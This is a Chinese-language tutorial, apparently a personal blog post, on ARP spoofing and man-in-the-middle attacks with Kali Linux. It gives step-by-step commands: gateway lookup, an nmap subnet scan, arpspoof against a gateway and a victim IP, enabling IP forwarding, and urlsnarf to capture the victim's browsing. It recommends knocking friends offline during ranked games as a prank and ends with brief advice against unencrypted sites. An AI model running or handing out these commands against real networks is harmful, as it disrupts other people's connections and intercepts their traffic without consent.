arp欺騙和中間人攻擊
arp通訊協定(Address Resolution Protocol)的作用是告訴目標這個ip地址對應這個mac地址,而arp欺騙就是利用給目標錯的arp封包讓目標把流量傳到錯誤的地方。
kali linux字帶了arpspoof工具,可以用來執行arp欺騙攻擊。
先取得網關地址
ex:route -n
然後用nmap掃描同網段下的地址。
ex:nmap -sP 192.168.0.0/24
然後就可以開始arp欺騙了。
arpspoof -i 使用的網卡 -t 網關ip 目標ip
這個指令會告訴網關目標系統的mac地址是你的地址,所以目標會把你當做目標系統,然後目標系統就會斷線。
ex:arpspoof -i wlan0 -t 192.168.0.1 192.168.0.16
雖然顯示有連上網但就是動不了,因爲網關的回應沒有傳回來。
可以用這招來惡整朋友,在他們打排位的時候。
下次遇到這種情況雖然可能會錯但可以大聲喊出來,這是替身arp欺騙攻擊!!
還可以用路由轉發模式來獲得目標上網資訊,也就是中間人攻擊MITM (Man In The Middel)。
ex:
sudo su
echo 1 > /proc/sys/net/ipv4/ip_forward
開啟路由轉發不會回傳任何訊息。
照抄上一次
ex:arpspoof -i wlan0 -t 192.168.0.1 192.168.0.19
再一次,這次arpspoof的順序要反過來,因為這次要欺騙目標系統網關是你。
ex:arpspoof -i wlan0 -t 192.168.0.19 192.168.0.1
這樣網關認為目標系統是你,目標系統認為網關是你這樣你就是那個中間人了。
在目標主機中打上arp -a | findstr 關鍵字(查看apr緩存內涵關鍵字的內容)。
如果不同ip mac地址卻相同那,arp緩存就已經中毒了。
這時候就真的是替身arp欺騙攻擊。
因為有開啟路由轉發所以目標還是可以上網。
用urlsnarf -i 網路卡 來取得目標上網的網址。
http://www.bon.gov.au 是奧州的天氣網站。
為什麼要用這個呢?
因為它沒有加密(http),沒加密(http)的資料是用明文傳輸,如果加密(https)的話,就是用密文傳輸,所以urlsnarf掃不到,要用其他方法。
所以不要亂連網路,也不要用未加密的網站。